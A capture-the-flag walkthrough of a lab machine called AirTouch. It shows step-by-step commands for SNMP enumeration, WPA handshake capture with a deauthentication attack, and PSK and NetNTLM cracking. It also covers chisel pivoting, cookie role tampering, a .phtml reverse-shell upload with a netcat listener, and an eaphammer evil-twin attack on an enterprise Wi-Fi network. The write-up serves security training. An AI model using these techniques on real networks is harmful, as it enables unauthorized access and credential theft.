AirTouch
(Medium Linux)
OVERVIEW
So as always we are given an IP so let’s start the enumeration using NMAP
ENUMERATION
So there are only two ports that are opened one is SSH and other one is SNMP so if you do script scan on SNMP service on port 161 you will see the community string name (public) and host name (Consultant)
Now if you don’t even got the community name in script scan or not even hostname then you can bruteforce the community string using onesixtyone tool
onesixtyone -c /usr/share/wordlists/dirb/common.txt MACHINE-IP
You will get all three things → Hostname, Community String, Password(if present)
Otherwise if you got the community string from the Nmap scan then you can just use snmpwalk tool to just get more information such as OID’s etc
snmpwalk -v2c -c public MACHINE-IP
Now we got the creds now let’s ssh into the machine as consultant user (for convenience add the IP in /etc/hosts with the domain name as airtouch.htb)
ssh consultant@airtouch.htb
So upon login we saw that we can run all commands as root as their is no password so we did sudo su to escalate privileges
Now there is two images inside the current directory let’s see them using scp command from our attacker machine
scp consultant@airtouch.htb:Remote-path local-path
#scp consultant@airtouch.htb:/home/consultant/file.png /home/kali/Airtouch_htb/
As you can see this is a network of three VLAN’s (Virtual Local Area Network) on their respective network and we are currently on Consultant Vlan as Root User and if we do ip a we will see different WLAN (Wireless Local Area Network) Interfaces
So to see the other Wireless networks around us we can use a tool named as airodump-ng
airodump-ng wlan0
So AirTouch-Internet has a station connected so which means we can capture a handshake and then can try to crack the PSK key
For that we will use airodump-ng, aireplay-ng, aircrack-ng tools
airodump-ng --bssid F0:9F:C2:A3:F1:A7 -c 6 --write output wlan0
Now we will start our deauthentication attack on another terminal so that we can capture a handshake for that we will use aireplay-ng
aireplay-ng --deauth 4 -a F0:9F:C2:A3:F1:A7 -c 28:6C:07:FE:A3:22 wlan0
As you can see deauth has been done and now see the other terminal where you started airodump and press Ctrl+C to kill it as airodump-ng never ends on its own
Here we go we got the handshake now and most importantly we have the output-01.cap file in our current directory so let’s try cracking the handshake with aircrack-ng and for the wordlist you can find it in /root/eaphammer/wordlists/
aircrack-ng output-01.cap -w /root/eaphammer/wordlists/rockyou.txt
We got the PSK key for AirTouch-Internet, now we can operate under its network but before that let’s first see the output-01.cap file in wireshark with decrypted PSK key
For that first transfer the output-01.cap file to your local machine with same scp command as before
scp consultant@airtouch.htb:/path-to-cap-file /local-machine-path-where-you-want-to-save-it
Now open the file in wireshark by doing wireshark output-01.cap
Now there will be Two cases
→ You can see http packets when you search http in filter bar
→ You don’t see any packets when you search http in filter bar
So for those who can’t see http packets they have to follow a quick thing:
Go to Edit and then Preferences in menu bar of wireshark OR Press Ctrl + Shift + P
Then Click on Protocols and then drop down till you find IEEE 802.11 then click on it
You will see Edit Button beside Decryption keys
Then Press + button to add a key then type
wpa_pwd challengethen press apply and ok
Now you can also see HTTP packets when you search http on filter bar
Now Follow any packet to HTTP stream you will see that it is requesting /lab.php on host 192.168.3.1 Port 80 and inside we can see a PHPSESSID cookie with user role as User and it is a Wifi-Configuration Login Page So we can use this cookie to enter as Manager User
Cookie: PHPSESSID=cir69csvsr2qq6u8pac9eavsog; UserRole=user
But Before that let’s first enter into the AirTouch-Internet Network using wpa_supplicant
So in your consultant ssh shell do :
wpa_passphrase "AirTouch-Internet" "challenge" > /tmp/airtouch.conf
wpa_supplicant -B -i wlan0 -c /tmp/airtouch.conf
dhclient
This will assign a static ip to wlan0 under AirTouch-Internet Network you can check it using ip a
Now to access 192.168.3.1 Port 80 we need to do a little pivoting to our attacker machine using socks proxy so for that I am using chisel and if you don’t know how to install chisel and run it like me watch John Hammond Video On This → LINK
Now when you successfully have chisel in your local machine then do forward it to the victim machine using either scp or wget from a python server
So we have to forward the port 80 of 192.168.3.1 to our localhost with socks proxy
nano /etc/proxychains4.conf
At the last of the file add this line
socks5 127.0.0.1 1080
If there is already a socks4 command then comment it out with using # at the start of the line
Now head to the local machine and start a listener using chisel
./chisel server -p 9001 --reverse
And in victim machine do
./chisel client ATTACKER-IP:9001 R:80:192.168.3.1:80
After that go to you local machine browser and type http://127.0.0.1/login.php
now if you remember we had manager user cookie so let’s replace it with existing cookie and then reload the page
As you can see we successfully got in as manager user and if you remember the UserRole=user so we can try changing it to admin and let’s see if something happens
So for that we have to use Burpsuite and have to capture the request and after capturing the request add the UserRole=admin beside PHPSESSID
Now forward the request and let’s see
Here we go we became admin and it gave us an Upload Functionality to upload files which we can use to upload reverse shell payload so let’s try uploading PHP PentestMonkey file
We came to know that php and html files are not allowed so let’s try the same file with .phtml extension which are used to bypass these php blockage warnings
Here we go it is uploaded to /uploads/ path now do open the listener in consultant shell as nc -lvnp 4444
and then go to http://127.0.0.1/uploads/hehe.phtml
And we will get the reverse shell as www-data
Now i decided to find which is the real user name which we can find in /etc/passwd
So it is User who we have to login as to get a stable shell or a ssh shell in Tablets VLAN
On further enumeration I found out the login.php file in /var/www/html
And i found User password let’s try login with this password
and we succeeded but i recommend taking ssh shell as user for a stable shell
USER FLAG
Now you can grab your user.txt from the /root directory
Now for privilege escalation i found the certs-backup directory which contains .crt’s and private key of AirTouch Organization which we can use to get the info about the Corp VLAN and also we found the remote user creds for AirTouch-Office Network
now copy the certs-backup folder to the consultant shell using scp so that we can use those certs using eaphammer tool which we saw in /root/eaphammer directory
# In user shell
cp -r /root/certs-backup/ /home/user
#now in consultant shell
scp -r user@192.168.3.1:/home/user/certs-backup /home/consultant
Now let’s use Eaphammer tool present in /root directory to perform evil-twin attack to retrieve NTLM Hash of any user in AirTouch-Office as we already have the crt and key required for that and basically in short our end goal is to Steal RADIUS credentials from AirTouch-Office network
RADIUS CREDENTIALS AND WHAT ARE WE DOING WITH EAPHAMMER
To know about importing certs you can read about that in Eaphammer Wiki also you can find commands for other attacks
So let’s import the certs using eaphammer
./eaphammer --cert-wizard import --ca-cert /home/consultant/certs-backup/ca.crt --server-cert /home/consultant/certs-backup/server.crt --private-key /home/consultant/certs-backup/server.key
We successfully imported the certs now lets perform the RADIUS creds attack we found in Eaphammer wiki
You can get AirTouch-Office bssid again from airodump-ng but this time we also listen for 5ghz bands also
airodump-ng --band abg wlan1
As you can see we got the bssid also do enable wlan1 then we will proceed with the attack
ifconfig wlan1 up
./eaphammer --bssid AC:8B:A9:AA:3F:D2 --essid AirTouch-Office --channel 44 --interface wlan1 --auth wpa-eap --creds
After it gets started wait till you got the $NETNTLM hash
Now save the hash in a hash.txt file and use Johntheripper to crack it
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Now since we get the Mschapv2 challenge so we will make the AirTouch-Office conf file a bit different unlike AirTouch-Internet You can see the syntax here → LINK
(Domain name is used in PEAP security)
nano /tmp/airtouchoffice.conf
→ domain/organization name can be found in ca.crt
network={
ssid="AirTouch-Office"
key_mgmt=WPA-EAP
eap=PEAP
identity="AirTouch\r4ulcl"
password="lab*******"
phase2="auth=MSCHAPV2"
}
Now same command like earlier to enter into the network
ifconfig wlan2 up
wpa_supplicant -B -i wlan2 -c /tmp/airtouchoffice.conf
dhclient wlan2
Now if you do ip a
We are inside Corp VLAN guys!!
Now let’s quickly ssh into the network using the remote creds we got earlier
ssh remote@10.10.10.1
We successfully got in but this time to be a root user it is not that easy like always so since this will also be related to wireless networks let’s check hostapd configuration files which by default is in /etc/hostapd
Bingo!! we got the files let’s check each one out if it have something interesting
On checking hostapd_wpe.eap_user file we got
We got an admin pass let’s check if we can su into it or not as it is also a user with /bin/bash permission as checked from /etc/passwd
ROOT FLAG
Well Well Well look what we found, admin password worked and it has sudo permission with no password so we escalate privileges to root user and now we can get our root.txt and solve the machine.
WE FINALLY DID IT !!!! CHALLENGE SOLVED !!
For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com
THANKS FOR READING !!!
